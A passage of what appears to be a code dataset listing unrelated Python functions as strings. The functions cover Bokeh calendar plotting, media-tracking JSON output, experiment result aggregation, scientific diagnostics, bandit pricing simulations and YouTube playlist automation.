tasks]\n duration_realized = [self.task_duration_realized[j] for j in tasks]\n task_names = [self.task_names[j] for j in tasks]\n category_ids = [[l for l, j in enumerate(array) if j != 0] for array in\n [self.task_category[j, :] for j in tasks]]\n category = [\", \".join(\n 
[self.cat_names[l] for l, j in enumerate(array) if j != 0]) for\n array in [self.task_category[j, :] for j in tasks]]\n data_tooltips = dict(\n chunk_min=chunk_min,\n chunk_max=chunk_max,\n affinity_cognitive=affinity_cognitive,\n affinity_cog_slot=affinity_cog_slot,\n affinity_cog_task=affinity_cog_task,\n willpower_task=willpower_task,\n willpower_cumulative=willpower_cumulative,\n duration=duration,\n duration_realized=duration_realized,\n task_id=tasks,\n task=task_names,\n category=category,\n )\n\n offset = self.num_tasks - self.num_categories\n # Use #deebf7 as placeholder/default event color\n colors = [COLORS[i % len(COLORS)] if i < offset else '#ffffcc' for i in\n tasks]\n data1 = data_tooltips.copy()\n data1.update(dict(\n top=top,\n bottom=bottom,\n left=left,\n right=right,\n colors=colors,\n ))\n source1 = ColumnDataSource(data=data1)\n\n TOOLTIPS = [(\"task\", \"@task\"),\n (\"category\", \"@category\"),\n (\"duration\", \"@duration_realized / @duration\"),\n (\"willpower\", \"@willpower_task\"),\n (\"willpower (cum)\", \"@willpower_cumulative\"),\n (\"chunk_range\", \"(@chunk_min, @chunk_max)\"),\n (\"affinity [slot x task]\", \"@affinity_cognitive = \"\n \"@affinity_cog_slot x \"\n \"@affinity_cog_task\"),\n (\"task_id\", \"@task_id\"),\n (\"index\", \"$index\"),\n (\"(t,l)\", \"(@bottom, @left)\"),\n ]\n\n # [Bokeh] inverted axis range example:\n # https://groups.google.com/a/continuum.io/forum/#!topic/bokeh/CJAvppgQmKo\n yr = Range1d(start=22, end=6)\n # yr = Range1d(start=24.5, end=-0.5)\n xr = Range1d(start=-0.3, end=7.3)\n p = figure(plot_width=1000, plot_height=600, y_range=yr, x_range=xr,\n tooltips=TOOLTIPS,\n title=\"Calendar: {} to {}\".format(start_str, end_str))\n self.p = p\n output_file(\"calendar.html\")\n\n p.xaxis[0].axis_label = 'Weekday ({}-{})'.format(start_weekday_str,\n end_weekday_str)\n p.yaxis[0].axis_label = 'Hour (7AM-9:30PM)'\n\n # Replace default yaxis so that each hour is displayed\n p.yaxis[0].ticker.desired_num_ticks = int(tutil.HOURS_PER_DAY)\n p.yaxis[0].ticker.num_minor_ticks = 4\n p.xaxis[0].ticker.num_minor_ticks = 0\n\n # Display task allocation as colored rectangles\n p.quad(top='top', bottom='bottom', left='left', right='right',\n color='colors', fill_alpha=0.7, line_alpha=0.5, source=source1)\n\n # Pre-process task names for display (no repeats, abbreviated names)\n # FIXME(cathywu) currently assumes that y is in time order, which may\n # not be the case when more task types are incorporated\n task_display = []\n curr_task = \"\"\n for name in task_names:\n if name == curr_task:\n task_display.append(\"\")\n else:\n curr_task = name\n task_display.append(name)\n data2 = data_tooltips.copy()\n data2.update(dict(\n x=left,\n y=top,\n # abbreviated version of task\n task=[k[:19] for k in task_display],\n ))\n source2 = ColumnDataSource(data=data2)\n\n # Annotate rectangles with task name\n # [Bokeh] Text properties:\n # https://bokeh.pydata.org/en/latest/docs/user_guide/styling.html#text-properties\n labels = LabelSet(x='x', y='y', text='task', level='glyph', x_offset=3,\n y_offset=-1, source=source2, text_font_size='7pt',\n render_mode='canvas')\n p.add_layout(labels)\n\n # Display cognitive affinity as rectangle to the right of the task\n colors_affinity = np.array(\n np.array(affinity_cognitive) * (NUM_AFFINITY - 1), dtype=int)\n colors_affinity = [COLORS_AFFINITY[NUM_AFFINITY - 1 - i] for i in\n colors_affinity.tolist()]\n data5 = data_tooltips.copy()\n data5.update(dict(\n top=(np.array(top) - 0.05).tolist(),\n 
bottom=(np.array(bottom) + 0.05).tolist(),\n left=(np.array(right) + 0.12).tolist(),\n right=(np.array(right) + 0.2).tolist(),\n colors=colors_affinity,\n ))\n source5 = ColumnDataSource(data=data5)\n p.quad(top='top', bottom='bottom', left='left', right='right',\n color='colors', source=source5)\n\n # Display willpower balance as rectangle to the right of the task\n colors_will = np.minimum(willpower_cumulative, 2)\n colors_will = np.maximum(colors_will, -2)\n colors_will += 2\n colors_will = np.array(colors_will / 4 * (NUM_WILL - 1), dtype=int)\n colors_will = [COLORS_WILL[i] for i in colors_will.tolist()]\n data6 = data_tooltips.copy()\n data6.update(dict(\n top=top,\n bottom=bottom,\n left=np.array(right) + 0.02,\n right=(np.array(right) + 0.1).tolist(),\n colors=colors_will,\n ))\n source6 = ColumnDataSource(data=data6)\n p.quad(top='top', bottom='bottom', left='left', right='right',\n color='colors', source=source6)\n\n # Display categories as a colored line on the left\n # TODO(cathywu) currently displays only the \"first\" category,\n # add support for more categories\n xs = []\n ys = []\n for y0, y1, x in zip(top, bottom, left):\n xs.append([x, x])\n ys.append([y0, y1])\n colors_cat = [COLORS_CAT[cat_ids[0] % len(COLORS_CAT)] for cat_ids in\n category_ids]\n data3 = data_tooltips.copy()\n data3.update(dict(\n xs=xs,\n ys=ys,\n colors=colors_cat,\n ))\n source3 = ColumnDataSource(data=data3)\n p.multi_line(xs='xs', ys='ys', color='colors', line_width=4,\n source=source3)\n\n # Annotate columns with day of the week\n data4 = data_tooltips.copy()\n data4.update(dict(\n x=[k + 0.1 for k in range(tutil.LOOKAHEAD)],\n y=[6.75 for _ in range(tutil.LOOKAHEAD)],\n weekday=[(c.START + timedelta(k)).strftime(\"%A\") for k in\n range(tutil.LOOKAHEAD)],\n ))\n source4 = ColumnDataSource(data=data4)\n labels2 = LabelSet(x='x', y='y', text='weekday', level='glyph',\n x_offset=3, y_offset=-1, source=source4,\n text_font_size='10pt', render_mode='canvas')\n p.add_layout(labels2)\n\n show(p)", "def handle_series_over(self, stats):\n #############################\n #\n #\n # YOUR CODE HERE\n #\n #\n #############################\n print(\"Series ended, these are the stats:\")\n print(str(stats))", "def on_task_output(self, task, config):\n series = {}\n movies = {}\n for entry in task.accepted:\n if all(field in entry for field in ['tvdb_id', 'series_name', 'series_season', 'series_episode']):\n eid = str(entry['tvdb_id'])\n sno = str(entry['series_season'])\n eno = entry['series_episode']\n show = series[eid] if eid in series else {'name': entry['series_name'], 'seasons': {}}\n if not sno in show['seasons']:\n show['seasons'][sno] = []\n if not eno in show['seasons'][sno]:\n show['seasons'][sno].append(eno)\n elif all(field in entry for field in ['imdb_id', 'movie_name']):\n movies[entry['imdb_id']] = entry['movie_name']\n if series:\n for eid, show in series.items():\n dest = os.path.join(config, 'series.watched.%s.json' % eid)\n data = {'name': show['name'], 'rating': 5}\n if os.path.exists(dest):\n with open(dest, 'r') as f:\n data = json.load(f)\n for season, episodes in show['seasons'].items():\n lst = data[season] if season in data else []\n data[season] = list(set(lst + episodes))\n text = json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))\n with open(dest, 'w') as f:\n f.write(text)\n self.log.info('Added watched episodes to Uoccin')\n if movies:\n dest = os.path.join(config, 'movies.watched.json')\n data = {}\n if os.path.exists(dest):\n with open(dest, 'r') as f:\n data = 
json.load(f)\n n = 0\n for eid, name in movies.items():\n if not eid in data:\n data[eid] = {'name': name, 'rating': 5}\n n += 1\n if n > 0:\n text = json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))\n with open(dest, 'w') as f:\n f.write(text)\n self.log.info('Added watched movies to Uoccin')", "def gather_data_from_multiple_runs(folder_path, runs, dataset=\"test\", tag='train/cross_entropy'):\n\n series = []\n for run in runs:\n path = os.path.join(folder_path,run,dataset)\n steps,values = extract_from_all_eventfiles(path, tag)\n print(\"run: {} extracted {} values\".format(run,len(values))) \n\n if len(values) > 0:\n\n s = pd.Series(data=values, index=steps,name=run).sort_index()\n # drop duplicates\n s = s[~s.index.duplicated(keep='last')]\n\n #.drop_duplicates(keep='last')\n series.append(s)\n \n return pd.concat(series,axis=1,join=\"outer\")", "def executor(self):", "def start_processing(self):", "def docker_worker():", "def create_series(self):\n series = []\n for timeline_object in self.timeline['results']:\n count = timeline_object[\"count\"]\n series.insert(0, count)\n self.query_total = self.query_total + count\n label = self.query[0:30]\n if len(self.query) > 30:\n label = label + \"...\"\n label = label + \" (\" + str(self.query_total) + \")\"\n series.insert(0, label)\n return series", "def run_stage_loop(cls, _opts, tests_results, put_next_stage):\n for _, result in tests_results:\n put_next_stage(result)", "def _fill_moment_results(self):\n toprocess = [('stock_tom', self.c_stock, 2),\n ('stock_woody', self.c_stock, 3),\n ('stock_non_woody', self.c_stock, 4),\n ('stock_acid', self.c_stock, 5),\n ('stock_water', self.c_stock, 6),\n ('stock_ethanol', self.c_stock, 7),\n ('stock_non_soluble', self.c_stock, 8),\n ('stock_humus', self.c_stock, 9),\n ('change_tom', self.c_change, 2),\n ('change_woody', self.c_change, 3),\n ('change_non_woody', self.c_change, 4),\n ('change_acid', self.c_change, 5),\n ('change_water', self.c_change, 6),\n ('change_ethanol', self.c_change, 7),\n ('change_non_soluble', self.c_change, 8),\n ('change_humus', self.c_change, 9),\n ('co2', self.co2_yield, 2)]\n for (resto, dataarr, dataind) in toprocess:\n # filter time steps\n ts = numpy.unique(dataarr[:,1])\n # extract data for the timestep\n for timestep in ts:\n ind = numpy.where(dataarr[:,1]==timestep)\n mean = stats.mean(dataarr[ind[0], dataind])\n mode_res = stats.mode(dataarr[ind[0], dataind])\n mode = mode_res[0]\n var = stats.var(dataarr[ind[0], dataind])\n skew = stats.skew(dataarr[ind[0], dataind])\n kurtosis = stats.kurtosis(dataarr[ind[0], dataind])\n if var>0.0:\n sd2 = 2 * math.sqrt(var)\n else:\n sd2 = var\n res = [[timestep, mean, mode[0], var, skew, kurtosis,\n mean - sd2, mean + sd2]]\n if resto=='stock_tom':\n self.md.stock_tom = numpy.append(self.md.stock_tom,\n res, axis=0)\n elif resto=='stock_woody':\n self.md.stock_woody = numpy.append(self.md.stock_woody,\n res, axis=0)\n elif resto=='stock_non_woody':\n self.md.stock_non_woody = numpy.append(\\\n self.md.stock_non_woody, res, axis=0)\n elif resto=='stock_acid':\n self.md.stock_acid = numpy.append(self.md.stock_acid,\n res, axis=0)\n elif resto=='stock_water':\n self.md.stock_water = numpy.append(self.md.stock_water,\n res, axis=0)\n elif resto=='stock_ethanol':\n self.md.stock_ethanol = numpy.append(self.md.stock_ethanol,\n res, axis=0)\n elif resto=='stock_non_soluble':\n self.md.stock_non_soluble= numpy.append(\n self.md.stock_non_soluble, res, axis=0)\n elif resto=='stock_humus':\n self.md.stock_humus = 
numpy.append(self.md.stock_humus,\n res, axis=0)\n elif resto=='change_tom':\n self.md.change_tom = numpy.append(self.md.change_tom,\n res, axis=0)\n elif resto=='change_woody':\n self.md.change_woody = numpy.append(self.md.change_woody,\n res, axis=0)\n elif resto=='change_non_woody':\n self.md.change_non_woody = numpy.append(\\\n self.md.change_non_woody, res, axis=0)\n elif resto=='change_acid':\n self.md.change_acid = numpy.append(self.md.change_acid,\n res, axis=0)\n elif resto=='change_water':\n self.md.change_water = numpy.append(self.md.change_water,\n res, axis=0)\n elif resto=='change_ethanol':\n self.md.change_ethanol = numpy.append(\n self.md.change_ethanol, res, axis=0)\n elif resto=='change_non_soluble':\n self.md.change_non_soluble=numpy.append(\n self.md.change_non_soluble, res, axis=0)\n elif resto=='change_humus':\n self.md.change_humus = numpy.append(self.md.change_humus,\n res, axis=0)\n elif resto=='co2':\n self.md.co2 = numpy.append(self.md.co2, res, axis=0)", "def main() -> None:\n\n task_results = {}\n for task in (Task.SINGLE_SEQUENCE, Task.MULTI_SEQUENCE):\n task_results[task] = []\n for category in CO3D_CATEGORIES[: (20 if task == Task.SINGLE_SEQUENCE else 10)]:\n for single_sequence_id in (\n (0, 1) if task == Task.SINGLE_SEQUENCE else (None,)\n ):\n category_result = evaluate_dbir_for_category(\n category, task=task, single_sequence_id=single_sequence_id\n )\n print(\"\")\n print(\n f\"Results for task={task}; category={category};\"\n + (\n f\" sequence={single_sequence_id}:\"\n if single_sequence_id is not None\n else \":\"\n )\n )\n pretty_print_nvs_metrics(category_result)\n print(\"\")\n\n task_results[task].append(category_result)\n _print_aggregate_results(task, task_results)\n\n for task in task_results:\n _print_aggregate_results(task, task_results)", "def runMetrics(self, dataPixel):\n\n resdict = {}\n # run the metrics on these data\n if len(dataPixel) <= 5:\n return\n for metric in self.metricList:\n resdict[metric.name] = metric.run(\n season(dataPixel.to_records(index=False)))\n # print('running',len(resdict[metric.name]))\n\n # concatenate the results\n for key in self.resfi.keys():\n if resdict[key] is not None:\n self.resfi[key] = pd.concat((self.resfi[key], resdict[key]))", "def aggregate_results(self):\n\n raise NotImplementedError", "def run(self, voxels, entry='all', freq_raw=False):\n\n # Note. 
in this case we are processing all raw data into the data \n # attribute, so despite having multiple raw FIDs, we are really \n # only processing one voxel, so no for loop\n\n # local reference to input data\n self.raw = self._dataset.get_source_data('prep')\n\n # Choose voxel - for saving result for current single voxel plot\n self.voxel = voxels[0]\n\n # select the chain processing functor based on the entry point\n if entry == 'all':\n funct_fidsum_wbnaa.do_processing_all(self)\n else:\n print('oooops!')\n\n # save data and parameter results into the Block results arrays\n self._block.data[0,0,0,:] = self.time_summed_offset.copy()\n \n # Return values specific to calling Tab that contains this Block.Chain\n # Used to update its self.view (plot_panel_spectrum object).\n\n plot_results = { 'freq_current' : self.freq_current.copy(),\n 'freq_summed' : self.freq_summed.copy(),\n 'freq_summed_offset' : self.freq_summed_offset.copy() }\n \n return plot_results", "def run(self):\n self.assign_inputs()\n self.execute()\n self.collect_outputs()", "def run(self) -> list:\n logger.debug('Fetching date %s', self._day.strftime('%Y/%m/%d'))\n \n regions = [r() for r in regions_list]\n air_quality = list()\n \n # fetch air quality of each region\n for r in regions:\n r.fetch_air_quality(self._day)\n \n # gather results from all regions\n for r in regions:\n # wait until region has fetched his data\n r.wait_for_quality()\n logging.info('Fetched region:%s for day:%s', r.name, self._day)\n air_quality.append({\n 'name': r.name,\n 'provinces': [\n {'name': x.name, 'short': x.short_name, 'quality': x.quality.asdict()} \n for x in r.provinces]\n })\n\n self._fetcher.fetched_result(self._day, air_quality)", "def run_diagnostics(self, env, scomm):\n super(modelTimeseries, self).run_diagnostics(env, scomm)\n scomm.sync()\n\n # setup some global variables\n requested_plots = list()\n local_requested_plots = list()\n\n # define the templatePath for all tasks\n templatePath = '{0}/diagnostics/diagnostics/ocn/Templates'.format(env['POSTPROCESS_PATH']) \n\n # all the plot module XML vars start with MVO_PM_ need to strip that off\n for key, value in env.iteritems():\n if (re.search(\"\\AMTS_PM_\", key) and value.upper() in ['T','TRUE']):\n k = key[4:] \n requested_plots.append(k)\n\n scomm.sync()\n print('model timeseries - after scomm.sync requested_plots = {0}'.format(requested_plots))\n\n if scomm.is_manager():\n print('model timeseries - User requested plot modules:')\n for plot in requested_plots:\n print(' {0}'.format(plot))\n\n print('model timeseries - Creating plot html header')\n templateLoader = jinja2.FileSystemLoader( searchpath=templatePath )\n templateEnv = jinja2.Environment( loader=templateLoader )\n \n template_file = 'model_timeseries.tmpl'\n template = templateEnv.get_template( template_file )\n \n # get the current datatime string for the template\n now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n # test the template variables\n templateVars = { 'casename' : env['CASE'],\n 'tagname' : env['CESM_TAG'],\n 'username' : env['USER_NAME'],\n 'start_year' : env['TSERIES_YEAR0'],\n 'stop_year' : env['TSERIES_YEAR1'],\n 'today': now\n }\n\n print('model timeseries - Rendering plot html header')\n plot_html = template.render( templateVars )\n\n scomm.sync()\n\n print('model timeseries - Partition requested plots')\n # partition requested plots to all tasks\n local_requested_plots = scomm.partition(requested_plots, func=partition.EqualStride(), involved=True)\n scomm.sync()\n\n for 
requested_plot in local_requested_plots:\n try:\n plot = ocn_diags_plot_factory.oceanDiagnosticPlotFactory('timeseries', requested_plot)\n\n print('model timeseries - Checking prerequisite for {0} on rank {1}'.format(plot.__class__.__name__, scomm.get_rank()))\n plot.check_prerequisites(env)\n\n print('model timeseries - Generating plots for {0} on rank {1}'.format(plot.__class__.__name__, scomm.get_rank()))\n plot.generate_plots(env)\n\n print('model timeseries - Converting plots for {0} on rank {1}'.format(plot.__class__.__name__, scomm.get_rank()))\n plot.convert_plots(env['WORKDIR'], env['IMAGEFORMAT'])\n\n except RuntimeError as e:\n # unrecoverable error, bail!\n print(\"model timeseries - Skipped '{0}' and continuing!\".format(requested_plot))\n print(e)\n\n scomm.sync()\n\n # initialize OrderedDict with plot_order list entries as key\n html_order = collections.OrderedDict()\n for plot in env['MTS_PLOT_ORDER'].split():\n html_order[plot] = '';\n\n if scomm.is_manager():\n for plot in env['MTS_PLOT_ORDER'].split():\n if plot in requested_plots:\n print('calling get_html for plot = {0}'.format(plot))\n plot_obj = ocn_diags_plot_factory.oceanDiagnosticPlotFactory('timeseries', plot)\n shortname, html = plot_obj.get_html(env['WORKDIR'], templatePath, env['IMAGEFORMAT'])\n html_order[shortname] = html\n\n for k, v in html_order.iteritems():\n print('Adding html for plot = {0}'.format(k))\n plot_html += v\n\n print('model timeseries - Adding footer html')\n with open('{0}/footer.tmpl'.format(templatePath), 'r') as tmpl:\n plot_html += tmpl.read()\n\n print('model timeseries - Writing plot index.html')\n with open( '{0}/index.html'.format(env['WORKDIR']), 'w') as index:\n index.write(plot_html)\n\n print('**************************************************************************')\n print('Successfully completed generating ocean diagnostics model timeseries plots')\n print('**************************************************************************')\n\n scomm.sync()\n\n # append the web_dir location to the env\n key = 'OCNDIAG_WEBDIR_{0}'.format(self._name)\n env[key] = env['WORKDIR']\n\n return env", "def run(self):\n # pylint: disable=too-many-locals\n loop_start = time.clock()\n partitions = []\n for item in self._results:\n partitions.append(\n Partition(item.name, item.dataframe, self.PARTITION_SIZE)\n )\n if item.name == self._primary_dataset:\n primary_dataset = partitions[-1]\n\n index = 0\n while index < self.PARTITION_SIZE:\n merge_sets = []\n combination = ['\\033[1m{0}\\033[0m'.format(self._mappings[self._primary_dataset])]\n for partition in partitions:\n if partition.name != self._primary_dataset:\n merge_sets.append({'name': partition.name, 'data': partition.next()})\n combination.append(self._mappings[partition.name])\n\n Logger().info(\n 'Running data extraction. 
Index {0} of {1} partitions, (combination: {2}, queries: {3})'.format(\n index,\n self.PARTITION_SIZE,\n ''.join(combination),\n len(self._queries)\n )\n )\n\n for size in range(self.PARTITION_SIZE):\n self._running = []\n q_start = time.clock()\n merge_table = self.merge(\n merge_sets + [{'name': primary_dataset.name, 'data': primary_dataset.next()}]\n )\n m_end = '{0:.2f}'.format(float(time.clock() - q_start))\n Logger().debug(\n 'Combination {0} merge table completed in {1} seconds ({2} rows)'.format(\n ''.join(combination),\n m_end,\n len(merge_table.index)\n )\n )\n for query in self._queries:\n self._running.append(\n DataThreader(merge_table, query, self._unique_columns)\n )\n\n self.monitor()\n times = [item.duration for item in self._running]\n message = '{4}\\n Combination {0}, Index {5}/{1}'\n message += ', merge_table size: {2}.\\n Average time per query {3}'\n Logger().debug(\n message.format(\n ''.join(combination),\n index,\n len(merge_table.index),\n times,\n [len(query.results.index) for query in self._queries],\n size\n )\n )\n del times\n del merge_table\n del self._running\n\n end_time = math.floor(time.clock() - loop_start)\n Logger().info('=========================================================================================')\n Logger().info(\n 'Completed partition {0} in {1} seconds. {2} queries, combination: {3}'.format(\n index,\n end_time,\n len(self._queries),\n ''.join(combination)\n )\n )\n Logger().info('=========================================================================================')\n primary_dataset.reset()\n index += 1\n\n Logger().info('Completed data extraction')\n self._complete = True", "def _publish_results(self):\n\n doc = Document()\n date = get_stamp()\n\n labels = ExperimentTemplateBase.parameters_to_string(self._topology_parameters_list)\n\n title = 'Mutual Information labels vs ' + self._experiment_name\n self.plot_save(title,\n self._mutual_info,\n self._baseline_mutual_info,\n 'Norm. 
mutual information',\n labels, date, self._docs_folder, doc)\n\n title = 'Weak classifier accuracy labels vs ' + self._experiment_name\n self.plot_save(title,\n self._classifier_accuracy,\n self._baseline_classifier_accuracy,\n 'Classifier accuracy',\n labels, date, self._docs_folder, doc) #, smoothing_size=3)\n\n title = 'average delta'\n f = plot_multiple_runs(\n self._different_steps[0], # here the X axes are identical\n self._average_delta,\n title=title,\n ylabel='log(delta)',\n xlabel='steps',\n labels=labels\n )\n add_fig_to_doc(f, path.join(self._docs_folder, title), doc)\n\n title = 'average boosting duration'\n f = plot_multiple_runs(\n self._different_steps[0],\n self._average_boosting_dur,\n title=title,\n ylabel='duration',\n xlabel='steps',\n labels=labels\n )\n add_fig_to_doc(f, path.join(self._docs_folder, title), doc)\n\n doc.write_file(path.join(self._docs_folder, to_safe_name(self._complete_name() + date + \".html\")))\n\n print('done')", "def _fetch_daily_internal(delta, swarming, process, endpoint, start, end, state,\n tags, parallel):\n out = {}\n with threading_utils.ThreadPool(1, parallel, 0) as pool:\n while start < end:\n cmd = _get_cmd(swarming, endpoint, _get_epoch(start),\n _get_epoch(start + delta), state, tags)\n pool.add_task(0, _run_json, start.strftime('%Y-%m-%d'), process, cmd)\n start += delta\n for k, v in pool.iter_results():\n sys.stdout.write('.')\n sys.stdout.flush()\n out[k] = v\n print('')\n return out", "def iterate_days(results_queue, idx=0):\n # Declaration of learners and results' vectors\n ucb1_learner = UCB1Learner(len(prices))\n tsgauss_learner = TSLearnerGauss(len(prices))\n vector_daily_price_ucb1_loc = []\n vector_daily_revenue_ucb1_loc = []\n vector_daily_price_ts_loc = []\n vector_daily_revenue_ts_loc = []\n\n print('Starting execution ' + str(idx))\n\n # For every day:\n for t in range(T):\n if t % 20 == 0:\n log(\"Iteration day: {:3d} - execution: {:3d}\".format(t, idx))\n # Get new users in the day t and their costs\n [new_user_1, new_user_2, new_user_3] = env.get_all_new_users_daily(bids[0])\n new_users = [new_user_1, new_user_2, new_user_3]\n [cost1, cost2, cost3] = env.get_all_cost_per_click(bids[0])\n cost = [cost1, cost2, cost3]\n\n # Get the total cost\n total_cost = 0\n for user in range(len(new_users)):\n total_cost += new_users[user] * cost[user]\n\n # Choose the arm and thus the price for UCB1\n daily_arm_ucb1 = ucb1_learner.pull_arm()\n daily_price_ucb1 = prices[daily_arm_ucb1]\n vector_daily_price_ucb1_loc.append(daily_price_ucb1)\n\n # Choose the arm and thus the price for Thomson Sampling\n daily_arm_ts = tsgauss_learner.pull_arm()\n daily_price_ts = prices[daily_arm_ts]\n vector_daily_price_ts_loc.append(daily_price_ts)\n\n # Calculate the number of bought items\n daily_bought_items_per_class_ucb1 = [0, 0, 0]\n daily_bought_items_per_class_ts = [0, 0, 0]\n\n for user in range(len(new_users)):\n for c in range(new_users[user]):\n daily_bought_items_per_class_ucb1[user] += env.buy(daily_price_ucb1, user + 1)\n daily_bought_items_per_class_ts[user] += env.buy(daily_price_ts, user + 1)\n\n # Sum up the n. 
of bought items\n daily_bought_items_ucb1 = sum(daily_bought_items_per_class_ucb1)\n daily_bought_items_ts = sum(daily_bought_items_per_class_ts)\n\n # Calculate the revenue\n daily_revenue_ucb1 = daily_bought_items_ucb1 * env.get_margin(daily_price_ucb1) - total_cost\n daily_revenue_ts = daily_bought_items_ts * env.get_margin(daily_price_ts) - total_cost\n\n # Add to the vector the daily revenue\n vector_daily_revenue_ucb1_loc.append(daily_revenue_ucb1)\n vector_daily_revenue_ts_loc.append(daily_revenue_ts)\n\n # Get delayed rewards\n next_30_days = [0] * 30\n for user in range(1, 4):\n next_30_days = list(\n map(add, next_30_days, env.get_next_30_days(daily_bought_items_per_class_ucb1[user - 1], daily_price_ucb1,\n user)))\n\n ucb1_learner.update_observations(daily_arm_ucb1, daily_revenue_ucb1, next_30_days)\n\n # Get delayed rewards\n next_30_days = [0] * 30\n for user in range(1, 4):\n next_30_days = list(\n map(add, next_30_days, env.get_next_30_days(daily_bought_items_per_class_ts[user - 1], daily_price_ts,\n user)))\n tsgauss_learner.update_observations(daily_arm_ts, daily_revenue_ts, next_30_days)\n\n if plot_l_t == True and t>=29:\n plot_learned_curve(tsgauss_learner.mu, tsgauss_learner.tau, real, tsgauss_learner.n_pulled_arms, plots_folder, t)\n\n print('Ending execution ' + str(idx))\n\n # put results in the given queue\n results_queue.put((ucb1_learner.collected_rewards, tsgauss_learner.collected_rewards, vector_daily_price_ucb1_loc,\n vector_daily_revenue_ucb1_loc, vector_daily_price_ts_loc, vector_daily_revenue_ts_loc, tsgauss_learner.mu, tsgauss_learner.tau, tsgauss_learner.n_pulled_arms))", "def execution(path_channel_data_base_json, path_playlist_ids_json, latest_date, oldest_date, api_service,\n selected_category, short_vid_index, long_vid_index, min_dur_long_vid=10, delay=True):\n today_date = datetime.today()\n\n log = f\"Date of execution: {today_date:%Y-%m-%d %H:%M:%S}\\n\" \\\n f\"Latest Date: {latest_date:%Y-%m-%d %H:%M:%S}\\n\" \\\n f\"Oldest Date: {oldest_date:%Y-%m-%d %H:%M:%S}\\n\\n\"\n\n print(log)\n\n music_channels = get_channel_list(path_channel_data_base_json, category=selected_category)\n playlist_ids = read_json(path_playlist_ids_json)\n\n all_vid = get_all_videos(music_channels, latest_date=latest_date, oldest_date=oldest_date, api_service=api_service)\n log += f'{all_vid[\"log_str\"]}\\n'\n\n duration_list = api_get_videos_duration(all_vid[\"all_video_ids\"], api_service)\n\n duration_filter_dict = duration_filter(duration_list, minute_threshold=min_dur_long_vid)\n log += f'{duration_filter_dict[\"logs\"]}\\n'\n\n print(\"Adding videos into playlists...\\n\")\n log += \"Adding videos into playlists...\\n\\n\"\n\n log_short_vid_text = api_add_to_playlist(playlist_ids[short_vid_index], duration_filter_dict[\"short_videos\"],\n api_service, delay=delay)\n log += f'{log_short_vid_text}\\n'\n\n log_long_vid_text = api_add_to_playlist(playlist_ids[long_vid_index], duration_filter_dict[\"long_videos\"],\n api_service, delay=delay)\n log += f'{log_long_vid_text}\\n'\n\n print(\"- ALL DONE! -\\n\")\n log += \"- ALL DONE! 
-\\n\"\n\n log += f\"\\n{clean_logs('../Logs')}\"\n\n with open(f'../Logs/Log_{today_date:%Y-%m-%d_%H.%M.%S}.txt', 'w', encoding=\"utf-8\") as file:\n file.write(log)\n\n sleep(5)\n\n webbrowser.open(f\"https://www.youtube.com/playlist?list={playlist_ids[short_vid_index]}\")\n webbrowser.open(f\"https://www.youtube.com/playlist?list={playlist_ids[long_vid_index]}\")", "def _timeseries_calc(ifg_paths, params, vcmt, tiles, preread_ifgs):\n if params[cf.TIME_SERIES_CAL] == 0:\n log.info('Time Series Calculation not required')\n return\n\n if params[cf.TIME_SERIES_METHOD] == 1:\n log.info('Calculating time series using Laplacian Smoothing method')\n elif params[cf.TIME_SERIES_METHOD] == 2:\n log.info('Calculating time series using SVD method')\n\n output_dir = params[cf.TMPDIR]\n total_tiles = len(tiles)\n process_tiles = mpiops.array_split(tiles)\n for t in process_tiles:\n log.debug(\"Calculating time series for tile \"+str(t.index)+\" out of \"+str(total_tiles))\n ifg_parts = [shared.IfgPart(p, t, preread_ifgs, params) for p in ifg_paths]\n mst_tile = np.load(os.path.join(output_dir, 'mst_mat_{}.npy'.format(t.index)))\n res = timeseries.time_series(ifg_parts, params, vcmt, mst_tile)\n tsincr, tscum, _ = res\n np.save(file=os.path.join(output_dir, 'tsincr_{}.npy'.format(t.index)), arr=tsincr)\n np.save(file=os.path.join(output_dir, 'tscuml_{}.npy'.format(t.index)), arr=tscum)\n mpiops.comm.barrier()\n log.debug(\"Finished timeseries calc!\")", "def main(self, model=None):\n result = pd.DataFrame()\n if model is None:\n model = Model.default()\n for season in [2011, 2012, 2013]:\n print(season)\n r = Runner(Season(season), model)\n current = r.run()\n result = result.append(current)\n return result", "def installs_series(request, addon, group, start, end, format):\n date_range = check_series_params_or_404(group, start, end, format)\n check_stats_permission(request, addon)\n\n series = get_series(Installed, addon=addon.id, date__range=date_range)\n\n if format == 'csv':\n return render_csv(request, addon, series, ['date', 'count'])\n elif format == 'json':\n return render_json(request, addon, series)", "def _run(self, index_list: List[np.ndarray]) -> Iterator[XData]:\n da_it = task_list(index_list, IdReader(), self.worker, self.nworkers)\n xdata_it = (dataarrays_to_xdata(d, self.meta) for d in da_it)\n return xdata_it", "def compute(self):\n self.find_n()\n\n # call hotspot field plots\n for scenario in self.scenarios:\n fields_dict = {}\n ancestor_files = []\n for filename in io.get_all_ancestor_files(self.cfg,\n pattern='hotspot_*.nc'):\n key = os.path.basename(os.path.dirname(filename))\n splitname = os.path.basename(filename).split(\"_\")\n if key.split(\"_\")[-1] == scenario:\n fields_dict[(\n f\"{splitname[-1].split('.nc')[0]}_\"\n f\"{splitname[1]}_{key}\")] = iris.load_cube(filename)\n ancestor_files.append(filename)\n fields_dict[\"scenario\"] = scenario\n fields_dict[\"ancestors\"] = ancestor_files\n self.hotspot_fields_plot(fields_dict)\n\n # call scatter plots\n for season in self.seasons:\n timeseries_dict = {\"large_scale\": {}, \"regional\": {}}\n for region, value in timeseries_dict.items():\n for filename in io.get_all_ancestor_files(\n self.cfg,\n pattern=f'rolling_mean_{region}_{season}.nc'):\n value[os.path.basename(os.path.dirname(filename))] = (\n iris.load_cube(filename))\n value[os.path.basename(\n os.path.dirname(filename))] = (filename)\n for var_combination in self.var_combinations:\n self.timeseries_scatter_plot(deepcopy(timeseries_dict), season,\n 
